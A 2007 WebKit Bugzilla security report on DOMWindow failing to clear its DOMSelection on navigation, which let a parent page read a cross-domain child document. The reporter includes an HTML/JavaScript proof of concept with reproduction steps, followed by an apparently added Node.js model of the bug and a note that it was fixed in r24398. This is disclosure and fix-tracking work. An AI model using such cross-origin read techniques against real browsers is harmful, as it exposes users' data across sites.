WebKit Bugzilla
RESOLVED FIXED
Bug 14610
Security problem in DOMWindow
https://bugs.webkit.org/show_bug.cgi?id=14610
Feng Qian
Reported
2007-07-13 11:12:42 PDT
The problem was introduced by recent code refactoring in kjs_window and DOMWindow. When navigating to a new page, DOMWindow does not clear up its DOMSelection object. To show the problem, save the following text into a file, say 'selection.html':

<html><script>
var child;
var sel;
function openwin() { child = open("hello.html"); }
function getsel() { sel = child.getSelection(); }
function reloadwin() { child.location="world.html"; }
function check() {
  var selected = sel.anchorNode;
  var new_doc = selected.ownerDocument;
  alert(new_doc.baseURI);
}
</script>
<body>
<button onclick="openwin()">open</button>
<button onclick="getsel()">get selection</button>
<button onclick="reloadwin()">reload</button>
<button onclick="check()">check</button>
</body></html>

Also create two files called hello.html and world.html:

<html><body>hello</body></html>

<html><body>world</body></html>

Put selection.html and hello.html in the same domain, and put world.html in a different domain (you need to change the URLs of hello.html and world.html in selection.html). Do the following steps:

1. load 'selection.html' in a new window;
2. click the 'open' button, it opens a child window;
3. select "hello" text in the child window;
4. click the 'get selection' in the parent window;
5. click the 'check' button, an alert window pops up and displays the URL of 'hello.html'. So far so good.
6. click the 'reload' button in the parent window, it loads the 'world.html' page in the child window. Note that now, the parent window and the child window are in different domains.
7. select 'world' in the child window;
8. click the 'check' button in the first window. An alert window pops up, and displays the URL of 'world.html'.

At this point, the parent window has full access to the Document object and DOM nodes under it in the child window even though they are from different domains. I will make a patch later.
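The following is an added illustration of the invariant the report describes, written as a small Node.js model; it is not WebKit code and does not reproduce the actual fix in r24398. A parent holds on to the child's Selection object, the child then commits a cross-origin document, and the parent reads the stale handle. The `DOMWindow`, `DOMSelection`, `Frame` and `Document` classes, the `clear()` hook and the two URLs are constructed for the model; the real bindings also apply same-origin checks, which are omitted here to isolate the one point the report makes: per-window objects must be reset when the window navigates, otherwise a handle obtained before navigation keeps resolving to whatever document the frame shows afterwards.

```javascript
// Constructed model of the DOMWindow/DOMSelection lifetime bug (not WebKit code).

class Document {
  constructor(url, text) {
    this.baseURI = url;
    // Single node standing in for the selected text's anchor node.
    this.body = { ownerDocument: this, textContent: text };
  }
}

class Frame {
  constructor() { this.document = null; }   // replaced on every navigation
}

class DOMSelection {
  constructor(frame) { this.frame = frame; }
  // Called by the window when it is cleared for navigation (fixed model only).
  disconnectFrame() { this.frame = null; }
  get anchorNode() {
    if (!this.frame || !this.frame.document) return null;
    return this.frame.document.body;        // model: the body is what was selected
  }
}

class DOMWindow {
  // clearSelectionOnNavigate=false reproduces the reported behaviour,
  // true models the intended behaviour (selection reset on navigation).
  constructor(frame, clearSelectionOnNavigate) {
    this.frame = frame;
    this.clearSelectionOnNavigate = clearSelectionOnNavigate;
    this.selection = null;
  }
  getSelection() {
    if (!this.selection) this.selection = new DOMSelection(this.frame);
    return this.selection;                  // same object is handed out every time
  }
  // Hook run when the frame commits a new document.
  clear() {
    if (this.clearSelectionOnNavigate && this.selection) {
      this.selection.disconnectFrame();     // stale handles now yield null
      this.selection = null;                // next getSelection() builds a fresh one
    }
  }
  navigate(url, text) {
    this.clear();
    this.frame.document = new Document(url, text);
  }
}

// Replays the report's steps: get the selection while the child shows a
// same-origin page, navigate the child cross-origin, then read anchorNode
// through the old handle. Returns the baseURI the stale handle exposes, or
// null when the handle was correctly disconnected.
function runScenario(clearSelectionOnNavigate) {
  const frame = new Frame();
  const child = new DOMWindow(frame, clearSelectionOnNavigate);
  child.navigate("http://a.example/hello.html", "hello");   // constructed URL
  const sel = child.getSelection();                          // parent's getsel()
  child.navigate("http://b.example/world.html", "world");   // constructed, other origin
  const node = sel.anchorNode;                               // parent's check()
  return node ? node.ownerDocument.baseURI : null;
}

console.log("reported behaviour:", runScenario(false)); // leaks world.html's document
console.log("selection cleared on navigate:", runScenario(true)); // null
```

The useful check for a reviewer of this kind of fix is the second call: any object a window hands out that is bound to the frame (selection, location, history, timers, event listeners) has to be detached in the same clear path, not just the one that a particular test case happened to exercise.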
Sam Weinig
Comment 1
2007-07-13 11:27:15 PDT
<rdar://problem/5333782>
Sam Weinig
Comment 2
2007-07-17 22:44:01 PDT
Fixed in r24398.